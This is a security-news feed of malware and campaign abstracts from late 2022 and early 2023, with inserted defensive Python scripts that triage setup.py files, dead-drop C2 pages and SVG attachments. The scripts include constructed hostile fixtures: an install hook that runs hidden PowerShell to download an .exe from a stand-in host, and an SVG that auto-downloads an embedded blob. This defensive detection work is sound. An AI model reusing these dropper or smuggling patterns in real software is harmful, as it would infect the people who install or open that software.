Cybercriminals are using phishing websites that mimic popular software, and ranking them higher via Google Ads, to trick users into downloading Rhadamanthys Stealer. The stealer also spreads through spam emails carrying an attachment that drops the malicious payload. The stealer targets several applications, in... Cyware
January 17, 2023
Massive Network of Hundreds of Fake Websites Distributing Raccoon and Vidar Stealers Full Text
Abstract
Attackers have been using a large and resilient infrastructure to distribute two prominent info-stealers—Raccoon and Vidar—possibly since early 2020, revealed security experts. Experts found that the intrusion sets are implementing defense evasion techniques to increase the chances of successfully... Cyware
January 17, 2023
Google Ads Malware Wipes NFT Influencer’s Crypto Wallet Full Text
Abstract
An NFT influencer with the Twitter handle @NFT_GOD claims to have lost thousands of dollars worth of non-fungible tokens (NFTs) and crypto in a Google Ads-delivered malware attack.Cyware
January 17, 2023
This banking virus is ‘December 2022’s Most Wanted Malware’ Full Text
Abstract
According to Check Point's Global Threat Index for December 2022 report, Qbot was the most prevalent malware last month impacting 7% of organizations worldwide, followed by Emotet with a global impact of 4% and XMRig with a global impact of 3%.Cyware
January 17, 2023
Zoho ManageEngine PoC Exploit to be Released Soon - Patch Before It’s Too Late! Full Text
Abstract
Users of Zoho ManageEngine are being urged to patch their instances against a critical security vulnerability ahead of the release of a proof-of-concept (PoC) exploit code. The issue in question is CVE-2022-47966, an unauthenticated remote code execution vulnerability affecting several products due to the use of an outdated third-party dependency, Apache Santuario. "This vulnerability allows an unauthenticated adversary to execute arbitrary code," Zoho warned in an advisory issued late last year, noting that it affects all ManageEngine setups that have the SAML single sign-on (SSO) feature enabled, or had it enabled in the past. Horizon3.ai has now released Indicators of Compromise (IOCs) associated with the flaw, stating that it was able to successfully reproduce the exploit against ManageEngine ServiceDesk Plus and ManageEngine Endpoint Central products. "The vulnerability is easy to exploit and a good candidate for attackers to 'spray and pray' acr... The Hacker News
January 17, 2023
Fortinet observed three rogue PyPI packages spreading malware Full Text
Abstract
Researchers discovered three malicious packages that have been uploaded to the Python Package Index (PyPI) repository by Lolip0p group. FortiGuard Labs researchers discovered three malicious PyPI packages (called ‘colorslib’, ‘httpslib’,...Security Affairs
January 17, 2023
Researchers Uncover 3 PyPI Packages Spreading Malware to Developer Systems Full Text
Abstract
A threat actor by the name Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that are designed to drop malware on compromised developer systems. The packages – named colorslib (versions 4.6.11 and 4.6.12), httpslib (versions 4.6.9 and 4.6.11), and libhttps (version 4.6.12) – were uploaded by the author between January 7, 2023, and January 12, 2023. They have since been yanked from PyPI but not before they were cumulatively downloaded over 550 times. The modules come with identical setup scripts that are designed to invoke PowerShell and run a malicious binary ("Oxzy.exe") hosted on Dropbox, Fortinet disclosed in a report published last week. The executable, once launched, triggers the retrieval of a next-stage, also a binary named update.exe, that runs in the Windows temporary folder ("%USER%\AppData\Local\Temp\"). update.exe is flagged by antivirus vendors on VirusTotal as an information stealer that's also capable of... The Hacker News
January 16, 2023
EyeSpy Spyware Targets Iranian VPN Users Full Text
Abstract
Bitdefender security analysts stumbled across a malware campaign dropping EyeSpy spyware, which is believed to be built from components of a monitoring application called SecondEye. The campaign appears to have begun in May last year from Iran, with infections detected across Germany and the U.S. ... Cyware
January 16, 2023
Raccoon and Vidar Stealers Spreading via Massive Network of Fake Cracked Software Full Text
Abstract
A "large and resilient infrastructure" comprising over 250 domains is being used to distribute information-stealing malware such as Raccoon and Vidar since early 2020. The infection chain "uses about a hundred of fake cracked software catalogue websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub," cybersecurity firm SEKOIA said in an analysis published earlier this month. The French cybersecurity company assessed the domains to be operated by a threat actor running a traffic direction system (TDS), which allows other cybercriminals to rent the service to distribute their malware. The attacks target users searching for cracked versions of software and games on search engines like Google, surfacing fraudulent websites on top by leveraging a technique called search engine optimization (SEO) poisoning to lure victims into downloading and executing the malicious payloads. The poisoned result... The Hacker News
January 16, 2023
Experts spotted a backdoor that borrows code from CIA’s Hive malware Full Text
Abstract
Netlab 360 observed unidentified threat actors using a new backdoor based on the US CIA's Project Hive malware suite. Researchers from Qihoo Netlab 360 reported that unidentified threat actors are using a new backdoor based on the US CIA's Project Hive...Security Affairs
January 16, 2023
New Backdoor Created Using Leaked CIA’s Hive Malware Discovered in the Wild Full Text
Abstract
Unidentified threat actors have deployed a new backdoor that borrows its features from the U.S. Central Intelligence Agency (CIA)'s Hive multi-platform malware suite, the source code of which was released by WikiLeaks in November 2017. "This is the first time we caught a variant of the CIA Hive attack kit in the wild, and we named it xdr33 based on its embedded Bot-side certificate CN=xdr33," Qihoo Netlab 360's Alex Turing and Hui Wang said in a technical write-up published last week. xdr33 is said to be propagated by exploiting an unspecified N-day security vulnerability in F5 appliances. It communicates with a command-and-control (C2) server using SSL with forged Kaspersky certificates. The intent of the backdoor, per the Chinese cybersecurity firm, is to harvest sensitive information and act as a launchpad for subsequent intrusions. It improves upon Hive by adding new C2 instructions and functionalities, among other implementation changes. The ELF... The Hacker News
January 11, 2023
New Analysis Reveals Raspberry Robin Can be Repurposed by Other Threat Actors Full Text
Abstract
A new analysis of Raspberry Robin's attack infrastructure has revealed that it's possible for other threat actors to repurpose the infections for their own malicious activities, making it an even more potent threat. Raspberry Robin (aka QNAP worm), attributed to a threat actor dubbed DEV-0856, is malware that has increasingly come under the radar for being used in attacks aimed at finance, government, insurance, and telecom entities. Given its use by multiple threat actors to drop a wide range of payloads such as SocGholish, Bumblebee, TrueBot, IcedID, and LockBit ransomware, it's suspected to be a pay-per-install (PPI) botnet capable of serving next-stage payloads. Raspberry Robin, notably, employs infected USB drives as a propagation mechanism and leverages breached QNAP network-attached storage (NAS) devices as first-level command-and-control (C2). Cybersecurity firm SEKOIA said it was able to identify at least eight virtual private servers (VPSs) hosted... The Hacker News
January 10, 2023
Kinsing malware targets Kubernetes environments via misconfigured PostgreSQL Full Text
Abstract
Kinsing cryptojacking operators are exploiting misconfigured and exposed PostgreSQL servers to access Kubernetes environments. Researchers at Microsoft Defender for Cloud observed threat actors behind the Kinsing cryptojacking operation...Security Affairs
January 9, 2023
Malicious PyPI Packages Using Cloudflare Tunnels to Sneak Through Firewalls Full Text
Abstract
In yet another campaign targeting the Python Package Index (PyPI) repository, six malicious packages have been found deploying information stealers on developer systems. The now-removed packages, which were discovered by Phylum between December 22 and December 31, 2022, include pyrologin, easytimestamp, discorder, discord-dev, style.py, and pythonstyles. The malicious code, as is increasingly the case, is concealed in the setup script (setup.py) of these libraries, meaning running a "pip install" command is enough to activate the malware deployment process. The malware is designed to launch a PowerShell script that retrieves a ZIP archive file, installs invasive dependencies such as pynput, pydirectinput, and pyscreenshot, and runs a Visual Basic Script extracted from the archive to execute more PowerShell code. "These libraries allow one to control and monitor mouse and keyboard input and capture screen contents," Phylum said in a technical report published... The Hacker News
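Both this entry and the Lolip0p packages above turn on the same mechanism: setup.py is arbitrary Python that pip executes at install time, so the payload never needs the package to be imported. The following static triage script is an added example (not code from Phylum, Fortinet or any of the packages named on the page) that a practitioner can run against a downloaded sdist's setup.py before installing it. It uses only the standard library; the two sample setup scripts, the hypothetical host example.invalid and the package name demo-pkg are constructed for the demonstration. It flags the three signals those campaigns share: calls that spawn a process or decode/execute data, string literals that smell like a download-and-run command, and a custom cmdclass that hooks the install command.

```python
"""Static triage of a setup.py for install-time execution (added example)."""
import ast
import re

# Dotted call names that almost never belong in a build script.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "exec", "eval",
    "urllib.request.urlopen", "base64.b64decode",
}
# String-literal fragments typical of download-and-run droppers.
SUSPICIOUS_STRINGS = re.compile(
    r"powershell|cmd\.exe|\biwr\b|-enc\b|\.exe\b|dropbox\.com", re.IGNORECASE
)


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage_setup_py(source: str) -> dict:
    """Walk the AST and collect suspicious calls, strings and install hooks."""
    tree = ast.parse(source)
    findings = {"calls": [], "strings": [], "custom_cmdclass": False}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings["calls"].append((name, node.lineno))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SUSPICIOUS_STRINGS.search(node.value):
                findings["strings"].append((node.value[:40], node.lineno))
        elif isinstance(node, ast.keyword) and node.arg == "cmdclass":
            # Overriding install/develop is how a payload hooks `pip install`.
            findings["custom_cmdclass"] = True
    return findings


def is_suspicious(findings: dict) -> bool:
    return bool(findings["calls"] or findings["strings"] or findings["custom_cmdclass"])


# Constructed sample: the shape of a setup.py that runs PowerShell on install.
MALICIOUS_SETUP = '''
import subprocess
from setuptools import setup
from setuptools.command.install import install


class PostInstall(install):
    def run(self):
        install.run(self)
        # hypothetical host for the demo, not one taken from the page
        subprocess.run(["powershell", "-w", "hidden", "-c",
                        "iwr https://example.invalid/x.exe -OutFile x.exe"])


setup(name="demo-pkg", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed sample: an ordinary setup.py with nothing to flag.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="demo-pkg", version="0.1", packages=find_packages())
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, is_suspicious(triage_setup_py(src)), triage_setup_py(src))
```

The heuristics are deliberately narrow; an obfuscated script that builds its command from chunks will evade the string check, which is why the call check (exec, eval, base64.b64decode) and the cmdclass check are kept as independent signals. Running the triage on `pip download --no-deps --no-binary :all: <pkg>` output before any `pip install` keeps setup.py from ever executing on the analyst's machine.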
January 8, 2023
Dridex targets MacOS users with a new delivery technique Full Text
Abstract
Experts warn of a new variant of the Dridex banking malware that is targeting systems using the macOS operating system. Trend Micro experts discovered a new variant of the Dridex banking malware that targets the macOS platform and that used a new technique...Security Affairs
January 7, 2023
Vidar Stealer Operators Exploit SM Platforms to Evade Detection Full Text
Abstract
Information-stealer Vidar is once again found exploiting social media services such as TikTok, Telegram, Steam, and Mastodon as an intermediate command-and-control (C2) server. One advantage of this tactic is that such traffic is really difficult to identify and block using trivial security solutio... Cyware
January 7, 2023
IcedID malware campaign targets Zoom users Full Text
Abstract
Cyber researchers warn of a modified Zoom app that was used by threat actors in a phishing campaign to deliver the IcedID Malware. Cyble researchers recently uncovered a phishing campaign targeting users of the popular video conferencing and online...Security Affairs
January 7, 2023
Can You Trust Your VSCode Extensions? Full Text
Abstract
Aqua Nautilus researchers have recently discovered that attackers can easily impersonate popular Visual Studio Code extensions and trick unknowing developers into downloading them.Cyware
January 6, 2023
Dridex Malware Now Attacking macOS Systems with Novel Infection Method Full Text
Abstract
A variant of the infamous Dridex banking malware has set its sights on Apple's macOS operating system using a previously undocumented infection method, according to latest research. It has "adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files," Trend Micro researcher Armando Nathaniel Pedragoza said in a technical report. Dridex, also called Bugat and Cridex, is an information stealer that's known to harvest sensitive data from infected machines and deliver and execute malicious modules. It's attributed to an e-crime group known as Evil Corp (aka Indrik Spider). The malware is also considered to be a successor of Gameover Zeus, itself a follow-up to another banking trojan called Zeus. Previous Dridex campaigns targeting Windows have leveraged macro-enabled Microsoft Excel documents sent via phishing emails to deploy the payload. Trend Micro's a... The Hacker News
January 6, 2023
Dridex Returns With New Variant, Targets MacOS Using New Entry Method Full Text
Abstract
The variant analyzed by Trend Micro has made its way into the macOS platform and has adopted a new technique to deliver documents embedded with malicious macros to users without having to pretend to be invoices or other business-related files.Cyware
January 5, 2023
Shc-based Linux Malware Used to Install XMRig Miner Full Text
Abstract
The ASEC analysis team uncovered a new shell script compiler (shc)-based Linux malware dropping the XMRig miner on compromised systems. The attackers gained initial access through a dictionary attack against poorly managed Linux SSH servers. An attack chain spotted in the campaign included both the shc downloader... Cyware
January 5, 2023
SpyNote Strikes Again: Android Spyware Targeting Financial Institutions Full Text
Abstract
Financial institutions are being targeted by a new version of Android malware called SpyNote at least since October 2022. "The reason behind this increase is that the developer of the spyware, who was previously selling it to other actors, made the source code public," ThreatFabric said in a report shared with The Hacker News. "This has helped other actors [in] developing and distributing the spyware, often also targeting banking institutions." Some of the notable institutions that are impersonated by the malware include Deutsche Bank, HSBC U.K., Kotak Mahindra Bank, and Nubank. SpyNote (aka SpyMax) is feature-rich and comes with a plethora of capabilities that allow it to install arbitrary apps; gather SMS messages, calls, videos, and audio recordings; track GPS locations; and even hinder efforts to uninstall the app. It also follows the modus operandi of other banking malware by requesting permissions to accessibility services to extract two-facto... The Hacker News
January 5, 2023
The Evolving Tactics of Vidar Stealer: From Phishing Emails to Social Media Full Text
Abstract
The notorious information-stealer known as Vidar is continuing to leverage popular social media services such as TikTok, Telegram, Steam, and Mastodon as an intermediate command-and-control (C2) server. "When a user creates an account on an online platform, a unique account page that can be accessed by anyone is generated," AhnLab Security Emergency Response Center (ASEC) disclosed in a technical analysis published late last month. "Threat actors write identifying characters and the C2 address in parts of this page." In other words, the technique relies on actor-controlled throwaway accounts created on social media to retrieve the C2 address. An advantage to this approach is that should the C2 server be taken down or blocked, the adversary can trivially get around the restrictions by setting up a new server and editing the account pages to allow the previously distributed malware to communicate with the server. Vidar, first identified in 2018, is a commer... The Hacker News
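The dead-drop resolver pattern described here (and used by Drokbk with GitHub further down this page) means the real C2 is only ever present inside a public page wrapped in "identifying characters". An analyst who has captured such a profile page wants to pull the current C2 out of it so it can be blocked and so the page can be re-polled for changes. The script below is an added example, not code from ASEC, Vidar, or any vendor on the page. The delimiter "|||", the sample page and the address 203.0.113.7 (a documentation-range IP) are constructed assumptions; real operators pick their own markers, so MARKER must be set per sample.

```python
"""Extract a marker-delimited C2 from a saved dead-drop profile page (added example)."""
import html
import ipaddress
import re
from urllib.parse import urlparse

MARKER = "|||"  # hypothetical delimiter; set from the malware sample's config


def extract_dead_drop_c2(page_html: str, marker: str = MARKER) -> list:
    """Return http(s) URLs found between two copies of `marker` in the page.

    The page is HTML-unescaped first so that '&amp;' inside a URL round-trips;
    anything between markers that is not a URL with a host is discarded.
    """
    text = html.unescape(page_html)
    pattern = re.escape(marker) + r"(.+?)" + re.escape(marker)
    found = []
    for candidate in re.findall(pattern, text, flags=re.DOTALL):
        candidate = candidate.strip()
        parts = urlparse(candidate)
        if parts.scheme in ("http", "https") and parts.hostname:
            found.append(candidate)
    return found


def c2_host_kind(url: str) -> str:
    """'ip' when the C2 host is an IP literal (typical for throwaway infra), else 'domain'."""
    host = urlparse(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return "ip"
    except ValueError:
        return "domain"


# Constructed sample: a throwaway profile whose bio carries the marker-wrapped C2.
# The script block also contains a marker pair with junk, to show the URL filter.
SAMPLE_PROFILE = """
<html><head><title>profile</title><script>var x = '|||noise|||';</script></head>
<body><h1>some_user</h1>
<p class="bio">just here for the games |||http://203.0.113.7:8080/||| cheers</p>
</body></html>
"""

if __name__ == "__main__":
    for url in extract_dead_drop_c2(SAMPLE_PROFILE):
        print(url, c2_host_kind(url))
```

Because the operator can change the C2 simply by editing the bio, the indicator worth keeping is the account URL itself, not only the address it currently resolves to; re-running the extractor on a fresh fetch of that URL shows when the operator has rotated servers.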
January 4, 2023
New shc-based Linux Malware Targeting Systems with Cryptocurrency Miner Full Text
Abstract
A new Linux malware developed using the shell script compiler (shc) has been observed deploying a cryptocurrency miner on compromised systems. "It is presumed that after successful authentication through a dictionary attack on inadequately managed Linux SSH servers, various malware were installed on the target system," AhnLab Security Emergency Response Center (ASEC) said in a report published today. shc allows shell scripts to be converted directly into binaries, offering protections against unauthorized source code modifications. It's analogous to the BAT2EXE utility in Windows that's used to convert any batch file to an executable. In an attack chain detailed by the South Korean cybersecurity firm, a successful compromise of the SSH server leads to the deployment of an shc downloader malware along with a Perl-based DDoS IRC Bot. The shc downloader subsequently proceeds to fetch the XMRig miner software to mine cryptocurrency, with the IRC bot capable o... The Hacker News
January 4, 2023
New shc Linux Malware used to deploy CoinMiner Full Text
Abstract
Researchers discovered a new Linux malware developed with the shell script compiler (shc) that was used to deliver a cryptocurrency miner. The ASEC analysis team recently discovered a Linux malware developed with the shell script compiler (shc) that...Security Affairs
January 3, 2023
Raspberry Robin Worm Evolves to Attack Financial and Insurance Sectors in Europe Full Text
Abstract
Financial and insurance sectors in Europe have been targeted by the Raspberry Robin worm, as the malware continues to evolve its post-exploitation capabilities while remaining under the radar. "What is unique about the malware is that it is heavily obfuscated and highly complex to statically disassemble," Security Joes said in a new report published Monday. The intrusions, observed against Spanish and Portuguese-speaking organizations, are notable for collecting more victim machine data than previously documented, with the malware now exhibiting sophisticated techniques to resist analysis. Raspberry Robin, also called QNAP worm, is being used by several threat actors as a means to gain a foothold into target networks. Spread via infected USB drives and other methods, the framework has been recently put to use in attacks aimed at telecom and government sectors. Microsoft is tracking the operators of Raspberry Robin under the moniker DEV-0856. Security Joes' f... The Hacker News
January 3, 2023
BitRAT campaign relies on stolen sensitive bank data as a lure Full Text
Abstract
Experts warn of a new malware campaign using sensitive information stolen from a bank as a lure to spread the remote access trojan BitRAT. Qualys experts spotted a new malware campaign spreading a remote access trojan called BitRAT using sensitive...Security Affairs
January 2, 2023
WordPress Security Alert: New Linux Malware Exploiting Over Two Dozen CMS Flaws Full Text
Abstract
WordPress sites are being targeted by a previously unknown strain of Linux malware that exploits flaws in over two dozen plugins and themes to compromise vulnerable systems. "If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted web pages are injected with malicious JavaScripts," Russian security vendor Doctor Web said in a report published last week. "As a result, when users click on any area of an attacked page, they are redirected to other sites." The attacks involve weaponizing a list of known security vulnerabilities in 19 different plugins and themes that are likely installed on a WordPress site, using it to deploy an implant that can target a specific website to further expand the network. It's also capable of injecting JavaScript code retrieved from a remote server in order to redirect the site visitors to an arbitrary website of the attacker's choice. Doctor Web said it identified a second version of the backdoor... The Hacker News
December 30, 2022
New Linux malware targets WordPress sites by exploiting 30 bugs Full Text
Abstract
A new Linux malware has been exploiting 30 vulnerabilities in outdated WordPress plugins and themes to deploy malicious JavaScripts. Doctor Web researchers discovered a Linux malware, tracked as Linux.BackDoor.WordPressExploit.1, that compromises...Security Affairs
December 30, 2022
Google Ads Abused to Spread Malware Full Text
Abstract
Different malware operators are increasingly abusing the Google Ads platform to drop malware, including variants of Raccoon Stealer and the IcedID botnet. Threat actors clone the official websites of popular software to lure users into downloading their malicious versions.Cyware
December 29, 2022
Lazarus’s Subgroup BlueNoroff Adopts New Malware Delivery Method Full Text
Abstract
The financially motivated BlueNoroff group was found using a new malware strain to target financial institutions in Japan. The gang has also devised a new tactic to evade Mark-of-the-Web (MotW) security measures. Kaspersky researchers discovered more than 70 domains used by BlueNoroff. These... Cyware
December 29, 2022
GuLoader Uses New Anti-Analysis Techniques to Evade Security Software Full Text
Abstract
GuLoader has been updated with new anti-analysis techniques to dodge traditional security solutions. The new version is also hostile to systems running virtual machines: the malware scans the entire process memory for any virtual machine-related strings to thwart researchers and hostile virtualized env... Cyware
December 27, 2022
Malware Disguised as YouTube Bot Steals Sensitive Data Full Text
Abstract
Threat actors are distributing a new YouTube bot malware that can artificially boost the rankings of videos on YouTube and steal sensitive information from browsers. Upon execution, the malware performs an anti-VM check to prevent malware detection and analysis by researchers in a virtual envi... Cyware
December 27, 2022
Uncovering the link between PrivateLoader PPI service and RisePro stealer Full Text
Abstract
The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the RisePro info-stealing malware. The pay-per-install (PPI) malware downloader service PrivateLoader is being used to distribute the information-stealing...Security Affairs
December 26, 2022
GuLoader implements new evasion techniques Full Text
Abstract
Cybersecurity researchers exposed new evasion techniques adopted by an advanced malware downloader called GuLoader. CrowdStrike researchers detailed multiple evasion techniques implemented by an advanced malware downloader called GuLoader (aka...Security Affairs
December 24, 2022
New info-stealer malware infects software pirates via fake cracks sites Full Text
Abstract
A new information-stealing malware named 'RisePro' is being distributed through fake cracks sites operated by the PrivateLoader pay-per-install (PPI) malware distribution service.BleepingComputer
December 24, 2022
Raspberry Robin malware used in attacks against Telecom and Governments Full Text
Abstract
The Raspberry Robin worm attacks aimed at telecommunications and government office systems across Latin America, Australia, and Europe. Researchers from Trend Micro have uncovered a Raspberry Robin worm campaign targeting telecommunications and government...Security Affairs
December 22, 2022
Beyond ProxyNotShell - New OWASSRF Exploit Targets MS Exchange Full Text
Abstract
Security analysts at CrowdStrike reported a new exploit method called OWASSRF that chains CVE-2022-41080 with the ProxyNotShell remote code execution flaw CVE-2022-41082 in Microsoft Exchange servers. Through this, an attacker can pull off RCE attacks via Outlook Web Access (OWA) rather than the Autodiscover endpoint used by ProxyNotShell, so URL-rewrite mitigations for ProxyNotShell do not block it. A deeper study into i... Cyware
December 21, 2022
Info-stealers Used to Target Ukraine’s Military Systems Full Text
Abstract
Ukraine’s DELTA military system users were the target of a phishing attack that distributed infostealers identified as FateGrab and StealDeal. Email and instant messages with fake warnings to update the Delta certificates were used to lure victims. Upon execution, StealDeal and FateGrab malware wo... Cyware
December 21, 2022
Zerobot malware now spreads by exploiting Apache vulnerabilities Full Text
Abstract
The Zerobot botnet has been upgraded to infect new devices by exploiting security vulnerabilities affecting Internet-exposed and unpatched Apache servers.BleepingComputer
December 21, 2022
GodFather Android malware targets 400 banks, crypto exchanges Full Text
Abstract
An Android banking malware named 'Godfather' has been targeting users in 16 countries, attempting to steal account credentials for over 400 online banking sites and cryptocurrency exchanges.BleepingComputer
December 20, 2022
Newly Identified RisePro Malware is a Spin-off of Vidar Stealer Full Text
Abstract
RisePro stealer malware has been found targeting sensitive information on infected systems and harvesting data in the form of logs. It may have been dropped or downloaded by the pay-per-install malware downloader service PrivateLoader, finds Flashpoint. The malware first appeared on a Russian forum... Cyware
December 20, 2022
Raspberry Robin worm drops fake malware to confuse researchers Full Text
Abstract
The Raspberry Robin malware is now trying its hand at some trickery by dropping a fake payload to confuse researchers and evade detection when it detects it's being run within sandboxes and debugging tools.BleepingComputer
December 20, 2022
Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware Full Text
Abstract
Researchers spotted a malicious package in the Python Package Index (PyPI) repository that impersonates a software development kit (SDK) for SentinelOne. Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named 'SentinelOne,'...Security Affairs
December 19, 2022
Malicious ‘SentinelOne’ PyPI package steals data from developers Full Text
Abstract
Threat actors have published a malicious Python package on PyPI, named 'SentinelOne,' that pretends to be the legitimate SDK client for the trusted American cybersecurity firm but, in reality, steals data from developers.BleepingComputer
December 17, 2022
Glupteba malware is back in action after Google disruption Full Text
Abstract
The Glupteba malware botnet has sprung back into action, infecting devices worldwide after its operation was disrupted by Google almost a year ago.BleepingComputer
December 15, 2022
Hackers Use Microsoft-Signed Malicious Windows Drivers in Post-Exploitation Activity Full Text
Abstract
Microsoft revoked several hardware developer accounts after drivers signed through those profiles were leveraged by hackers in attacks, including ransomware incidents. Sophos revealed that Cuba ransomware operators used the BURNTCIGAR loader utility to install a malicious driver signed using Micros... Cyware
December 15, 2022
Crooks use HTML smuggling to spread QBot malware via SVG files Full Text
Abstract
Talos researchers uncovered a phishing campaign distributing the QBot malware to Windows systems using SVG files. Talos researchers uncovered a phishing campaign distributing the QBot malware using a new technique that leverages Scalable Vector Graphics...Security Affairs
December 14, 2022
Attackers use SVG files to smuggle QBot malware onto Windows systems Full Text
Abstract
QBot malware phishing campaigns have adopted a new distribution method using SVG files to perform HTML smuggling that locally creates a malicious installer for Windows.BleepingComputer
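HTML smuggling works because the attachment carries no executable: the SVG embeds JavaScript that base64-decodes an archive in the victim's browser, wraps it in a Blob and triggers a download, so a mail gateway scanning the attachment sees only text and image markup. The triage script below is an added example (not code from Talos or any QBot analysis on the page) that inspects an SVG offline for exactly that construction: script elements containing the decode/Blob/download idioms together with a long base64 literal, which it decodes to report the smuggled file's size and leading magic bytes. It uses only the standard library; the two sample SVGs are constructed here, and the embedded blob is a padded ZIP-style header rather than any real archive.

```python
"""Triage an SVG attachment for HTML smuggling (added example)."""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"
# JavaScript idioms used to rebuild a file client-side and hand it to the download path.
JS_INDICATORS = ("atob(", "Blob(", "createObjectURL", ".download", "msSaveOrOpenBlob")
# Quoted base64 runs long enough to carry a file rather than a short config value.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")


def analyze_svg(svg_text: str) -> list:
    """Return one finding per <script> element: indicator hits and decoded blobs."""
    root = ET.fromstring(svg_text)
    findings = []
    for el in root.iter():
        if el.tag not in ("script", SVG_NS + "script"):
            continue
        js = el.text or ""
        hits = [k for k in JS_INDICATORS if k in js]
        payloads = []
        for m in B64_LITERAL.finditer(js):
            try:
                raw = base64.b64decode(m.group(1), validate=True)
            except binascii.Error:
                continue  # long but not valid base64; ignore
            payloads.append({"size": len(raw), "magic": raw[:2]})
        findings.append({"indicators": hits, "payloads": payloads})
    return findings


def is_html_smuggling(findings: list) -> bool:
    """Flag when a script both carries an embedded blob and uses at least two download idioms."""
    return any(len(f["indicators"]) >= 2 and f["payloads"] for f in findings)


# Constructed payload: a ZIP-style header ('PK\x03\x04') padded out, standing in for an installer.
_FAKE_ARCHIVE_B64 = base64.b64encode(b"PK\x03\x04" + b"\x00" * 60).decode()

# Constructed sample: the shape of a smuggling SVG; nothing here is taken from a real campaign.
SMUGGLING_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<script type="text/javascript"><![CDATA[
var b64 = '{_FAKE_ARCHIVE_B64}';
var bin = atob(b64);
var bytes = new Uint8Array(bin.length);
for (var i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
var blob = new Blob([bytes], {{type: "application/zip"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.zip";
a.click();
]]></script>
</svg>"""

BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"/></svg>'

if __name__ == "__main__":
    for label, svg in (("smuggling", SMUGGLING_SVG), ("benign", BENIGN_SVG)):
        r = analyze_svg(svg)
        print(label, is_html_smuggling(r), r)
```

The decoded magic bytes are the useful part for a responder: "PK" means the browser would have written a ZIP (here typically wrapping an ISO or a JavaScript loader), "MZ" a bare PE. A gateway policy that simply blocks or detonates any SVG containing a script element catches this whole class, since legitimate image attachments rarely need script at all.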
December 13, 2022
Microsoft-signed malicious Windows drivers used in ransomware attacks Full Text
Abstract
Microsoft has revoked several Microsoft hardware developer accounts after drivers signed through their profiles were used in cyberattacks, including ransomware incidents.BleepingComputer
December 13, 2022
TrueBot Malware Downloader Comes with Alternative Delivery Methods Full Text
Abstract
Russian-speaking hacking group Silence dropped the TrueBot malware downloader on over 1,500 systems worldwide to deploy their set of hacking tools, including Grace malware, Cobalt Strike, Teleport, and Cl0p ransomware. Teleport is a new custom data leakage tool created by the group. It uses Truebot... Cyware
December 13, 2022
Drokbk Flying Under the Radar by using GitHub as Dead Drop Resolver Full Text
Abstract
A previously undocumented malware, dubbed Drokbk, was linked to an Iranian hacker group known as Nemesis Kitten (aka DEV-0270). The malware uses GitHub as a dead drop resolver to extract data from a compromised system or to receive commands. The malware is written in .NET and is deployed post-intru... Cyware
December 13, 2022
Experts detailed a previously undetected VMware ESXi backdoor Full Text
Abstract
A new Python backdoor is targeting VMware ESXi servers, allowing attackers to take over compromised systems. Juniper Networks researchers spotted a previously undocumented Python backdoor targeting VMware ESXi servers. The researchers discovered the backdoor...Security Affairs
December 12, 2022
New Python malware backdoors VMware ESXi servers for remote access Full Text
Abstract
A previously undocumented Python backdoor targeting VMware ESXi servers has been spotted, enabling hackers to execute commands remotely on a compromised system. BleepingComputer
December 12, 2022
Python, JavaScript Developers Targeted With Fake Packages Delivering Ransomware Full Text
Abstract
On Friday, Phylum security researchers warned that a threat actor was typosquatting popular PyPI packages to direct developers to malicious dependencies containing code to download payloads written in Golang (Go). Cyware
December 8, 2022
Zombinder APK binding service used in multiple malware attacks Full Text
Abstract
Zombinder is a third-party service on darknet used to embed malicious payloads in legitimate Android applications. While investigating a new malware campaign targeting Android and Windows systems, researchers at Threat Fabric discovered a darknet... Security Affairs
December 8, 2022
Trojanized OneNote Document Leads to Formbook Malware Full Text
Abstract
Trustwave SpiderLabs’ researchers uncovered threat actors using a OneNote document to move Formbook malware, an information stealing trojan sold on an underground hacking forum since mid-2016 as malware-as-a-service. Cyware
December 08, 2022
New ‘Zombinder’ platform binds Android malware with legitimate apps Full Text
Abstract
A darknet platform dubbed 'Zombinder' allows threat actors to bind malware to legitimate Android apps, causing victims to infect themselves while still having the full functionality of the original app to evade suspicion. BleepingComputer
December 07, 2022
New Zerobot malware has 21 exploits for BIG-IP, Zyxel, D-Link devices Full Text
Abstract
A new Go-based malware named 'Zerobot' has been spotted in mid-November using exploits for almost two dozen vulnerabilities in a variety of devices that include F5 BIG-IP, Zyxel firewalls, Totolink and D-Link routers, and Hikvision cameras. BleepingComputer
December 07, 2022
Hackers use new Fantasy data wiper in coordinated supply chain attack Full Text
Abstract
The Iranian Agrius APT hacking group is using a new 'Fantasy' data wiper in supply-chain attacks impacting organizations in Israel, Hong Kong, and South Africa. BleepingComputer
December 6, 2022
Ransomware Toolkit Cryptonite turning into an accidental wiper Full Text
Abstract
Researchers spotted a version of the open-source ransomware toolkit Cryptonite that doesn't support decryption capabilities. Fortinet researchers discovered a sample of malware generated with the publicly available open-source ransomware toolkit... Security Affairs
December 5, 2022
Exclusive: The largest mobile malware marketplace identified by Resecurity in the Dark Web Full Text
